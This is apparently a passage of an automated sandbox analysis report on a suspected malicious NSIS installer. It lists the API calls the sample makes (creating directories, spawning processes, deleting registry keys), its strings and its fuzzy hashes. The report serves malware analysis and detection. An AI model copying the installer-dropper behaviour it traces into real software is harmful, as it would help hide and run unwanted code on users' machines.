Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nst19C6.tmp
API String ID: 1356686001-640197537
Opcode ID: 828ec97eb1749f7d0dccac40ba64abed5895ac499d5866b086c5794a3236b8a4
Instruction ID: d4937ef9b5a83c2972188be2a0d5841753625f31b596684550d6a8464bef8130
Opcode Fuzzy Hash: 828ec97eb1749f7d0dccac40ba64abed5895ac499d5866b086c5794a3236b8a4
Instruction Fuzzy Hash: 34117FB1E00118BFEB10EBA4DE8AEAF767CFB50358F10413AF905B61D1D6B85D41A668

Uniqueness

Uniqueness Score: -1.00%

Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004056A3: CharNextA.USER32(?,?,pivot\drukmaases.kin,?,0040570F,pivot\drukmaases.kin,pivot\drukmaases.kin,?,?,74DF3410,0040545A,?,C:\Users\user\AppData\Local\Temp\,74DF3410,00000000), ref: 004056B1
Part of subcall function 004056A3: CharNextA.USER32(00000000), ref: 004056B6
Part of subcall function 004056A3: CharNextA.USER32(00000000), ref: 004056CA

CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs,00000000,00000000,000000F0), ref: 00401622

Strings

C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs, xrefs: 00401617

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
String ID: C:\Users\user\AppData\Roaming\kraftfuldheders\Fide231\recited\Antiputrefactive\Afmarcher\Overforbrugs
API String ID: 3751793516-2505418928
Opcode ID: 4885ffd880e05148dcf1fdd70a8cd6dc8aa3157c77afdd287b9ed92ee45deb14
Instruction ID: fe130fe747d7612bd359b5bee5f77481d56b475851a7b43d3d194bb92abb4f34
Opcode Fuzzy Hash: 4885ffd880e05148dcf1fdd70a8cd6dc8aa3157c77afdd287b9ed92ee45deb14
Instruction Fuzzy Hash: AF112531908150ABDB116F751D4496F37B0AA62366728073FF492B22E2C23C0942962E

Uniqueness

Uniqueness Score: -1.00%

Function 0040583A Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0040584E
GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405868

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040583D, 00405841
"C:\Users\user\Desktop\hnTW5HdWvY.exe", xrefs: 0040583A
nsa, xrefs: 00405845

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\hnTW5HdWvY.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2308823133
Opcode ID: 165f25902c12276048ad14c3faa9af412f6aa489c6d0a6d50344be84ac3f20e0
Instruction ID: 52717d4cd68eb3ad2d5284e259dd09d89c77f45c9904e037c47a6ea27e695b51
Opcode Fuzzy Hash: 165f25902c12276048ad14c3faa9af412f6aa489c6d0a6d50344be84ac3f20e0
Instruction Fuzzy Hash: 24F05E366482086BDB109E56DC44F9A7B98DB95750F14C02AFE44AA180D6B0D9648B99

Uniqueness

Uniqueness Score: -1.00%

Function 00402A3F Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(?,?,00000000,00000000,?), ref: 00402A60
RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A9C
RegCloseKey.ADVAPI32(?), ref: 00402AA5
RegCloseKey.ADVAPI32(?), ref: 00402ACA
RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AE8

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: ffc85435ca1e250b947e4d621e093e90361a198f70964f83faf9214d07e34134
Instruction ID: a469cac220e3dfead07ca09df23e0d0f9d1726d397e4729d51af2cb9ca56ac8c
Opcode Fuzzy Hash: ffc85435ca1e250b947e4d621e093e90361a198f70964f83faf9214d07e34134
Instruction Fuzzy Hash: 60116D31A04148FFDF219F90DE48EAF7B79EB44344F104176FA06A01A0D7B49E51AF59

Uniqueness

Uniqueness Score: -1.00%

Function 00401BB8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C18
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C30

Strings

!, xrefs: 00401BEC

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: e99dd21401efed87dc49a6cbbfa93a04913e4a180baa6c9a590e864f9320e764
Instruction ID: 4b9cb6e92412fb6e6e80457b7b9377e947a39d5b648e27d3fa4f73b4a66c0764
Opcode Fuzzy Hash: e99dd21401efed87dc49a6cbbfa93a04913e4a180baa6c9a590e864f9320e764
Instruction Fuzzy Hash: E321A171A04208AEEF05AFB4CD4AAAE7AB5AB40304F10457AF541B61D1D6B889409718

Uniqueness

Uniqueness Score: -1.00%

Function 004056F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405B7A: lstrcpynA.KERNEL32(?,?,00000400,0040313B,Profiling Setup,NSIS Error), ref: 00405B87

Part of subcall function 004056A3: CharNextA.USER32(?,?,pivot\drukmaases.kin,?,0040570F,pivot\drukmaases.kin,pivot\drukmaases.kin,?,?,74DF3410,0040545A,?,C:\Users\user\AppData\Local\Temp\,74DF3410,00000000), ref: 004056B1
Part of subcall function 004056A3: CharNextA.USER32(00000000), ref: 004056B6
Part of subcall function 004056A3: CharNextA.USER32(00000000), ref: 004056CA

lstrlenA.KERNEL32(pivot\drukmaases.kin,00000000,pivot\drukmaases.kin,pivot\drukmaases.kin,?,?,74DF3410,0040545A,?,C:\Users\user\AppData\Local\Temp\,74DF3410,00000000), ref: 0040574B
GetFileAttributesA.KERNELBASE(pivot\drukmaases.kin,pivot\drukmaases.kin,pivot\drukmaases.kin,pivot\drukmaases.kin,pivot\drukmaases.kin,pivot\drukmaases.kin,00000000,pivot\drukmaases.kin,pivot\drukmaases.kin,?,?,74DF3410,0040545A,?,C:\Users\user\AppData\Local\Temp\,74DF3410), ref: 0040575B

Strings

pivot\drukmaases.kin, xrefs: 004056FE, 00405703, 00405709, 00405744, 0040574A, 00405752, 0040575A

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: pivot\drukmaases.kin
API String ID: 3248276644-360973136
Opcode ID: 62525b7c2a38e913442d275aa1c28f230d0f9bde0bdea29c2ebf83fee8925d4c
Instruction ID: 37b6e5ee433a41c3c1a3ade2b68dfeb55dd06932413cee03f53a9676b214a67c
Opcode Fuzzy Hash: 62525b7c2a38e913442d275aa1c28f230d0f9bde0bdea29c2ebf83fee8925d4c
Instruction Fuzzy Hash: 5DF0AF25119D54A6C726333A1C49B9F1A55CEC3368F58053BF8A0B32D2DB3C8953ADAE

Uniqueness

Uniqueness Score: -1.00%

Function 0040532D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0079FD00,Error launching installer), ref: 00405352
CloseHandle.KERNEL32(?), ref: 0040535F

Strings

Error launching installer, xrefs: 00405340

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 645e93c5bb495a6f28651f45d9e8b18c91c15bb40d9c9ce812c265225a9d5b21
Instruction ID: 704f217b0c1b6eb60c5a067d09c70ef836417bf4f65591a609eb3a14675a7da7
Opcode Fuzzy Hash: 645e93c5bb495a6f28651f45d9e8b18c91c15bb40d9c9ce812c265225a9d5b21
Instruction Fuzzy Hash: 55E0ECB4A00209BBEB009F64EC0996FBBBCFB04344B048531E910E2250D778E4108AB9

Uniqueness

Uniqueness Score: -1.00%

Function 00403097 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00405DE5: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\hnTW5HdWvY.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,74DF3410,0040327D), ref: 00405E3D
Part of subcall function 00405DE5: CharNextA.USER32(?,?,?,00000000), ref: 00405E4A
Part of subcall function 00405DE5: CharNextA.USER32(?,"C:\Users\user\Desktop\hnTW5HdWvY.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,74DF3410,0040327D), ref: 00405E4F
Part of subcall function 00405DE5: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030A3,C:\Users\user\AppData\Local\Temp\,74DF3410,0040327D), ref: 00405E5F

CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3410,0040327D), ref: 004030B8

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403098, 0040309D, 004030A3, 004030AF, 004030B7, 004030BE
1033, xrefs: 004030BF

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID: 1033$C:\Users\user\AppData\Local\Temp\
API String ID: 4115351271-517883005
Opcode ID: 30d046a58fc0be9d4103ba1aeb580eff37f53929913a4ade3c81043231ead311
Instruction ID: ea5cc8e1fe03df48a2deef22c0a6e0afb1540a3998a3053c1cd1c9b1fd1a59a7
Opcode Fuzzy Hash: 30d046a58fc0be9d4103ba1aeb580eff37f53929913a4ade3c81043231ead311
Instruction Fuzzy Hash: 8CD0C92290AD3121D59237663C0AFCF095C9F9735EB019177F419740C65A6D1A8249EF

Uniqueness

Uniqueness Score: -1.00%

Function 0040218C Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405E7E: FindFirstFileA.KERNELBASE(?,0079FD48,pivot\drukmaases.kin,0040573B,pivot\drukmaases.kin,pivot\drukmaases.kin,00000000,pivot\drukmaases.kin,pivot\drukmaases.kin,?,?,74DF3410,0040545A,?,C:\Users\user\AppData\Local\Temp\,74DF3410), ref: 00405E89
Part of subcall function 00405E7E: FindClose.KERNEL32(00000000), ref: 00405E95

lstrlenA.KERNEL32 ref: 004021CC
lstrlenA.KERNEL32(00000000), ref: 004021D6
SHFileOperationA.SHELL32(?,?,?,00000000), ref: 004021FE

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000077F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000784000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.000000000079F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007C7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.00000000007D0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007D1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007E1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007EA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659146974.00000000007F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hnTW5HdWvY.jbxd

Similarity

API ID: FileFindlstrlen$CloseFirstOperation
String ID:
API String ID: 1486964399-0
Opcode ID: 9278265a1d6562d87b158310af3d550ec4f1355b6280d9e33ef3038b74222f92
Instruction ID: d7366e12310d7757e4ed7e6a11b03666cec2b5c10108ed9aa926a5205b7b5eac
Opcode Fuzzy Hash: 9278265a1d6562d87b158310af3d550ec4f1355b6280d9e33ef3038b74222f92
Instruction Fuzzy Hash: E9118271E04308AACB40EFF5C949A9EB7F8AF00308F10853BA501F72C5D6BCD9019759

Uniqueness

Uniqueness Score: -1.00%

Function 00401E32 Relevance: 4.5, APIs: 3, Instructions: 48synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00404E65: lstrlenA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000,0078EAA8,007890A8,?,?,?,?,?,?,?,?,?,00402F9E,00000000,?), ref: 00404E9E
Part of subcall function 00404E65: lstrlenA.KERNEL32(00402F9E,Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000,0078EAA8,007890A8,?,?,?,?,?,?,?,?,?,00402F9E,00000000), ref: 00404EAE
Part of subcall function 00404E65: lstrcatA.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00402F9E,00402F9E,Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,00000000,0078EAA8,007890A8), ref: 00404EC1
Part of subcall function 00404E65: SetWindowTextA.USER32(Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nst19C6.tmp\nsExec.dll), ref: 00404ED3
Part of subcall function 00404E65: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EF9
Part of subcall function 00404E65: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F13
Part of subcall function 00404E65: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F21

Part of subcall function 0040532D: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0079FD00,Error launching installer), ref: 00405352
Part of subcall function 0040532D: CloseHandle.KERNEL32(?), ref: 0040535F

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E6C
GetExitCodeProcess.KERNEL32(?,?), ref: 00401E7C
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EA1

Memory Dump Source

Source File: 00000000.00000002.1658713547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1658696695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658730160.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658744216.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
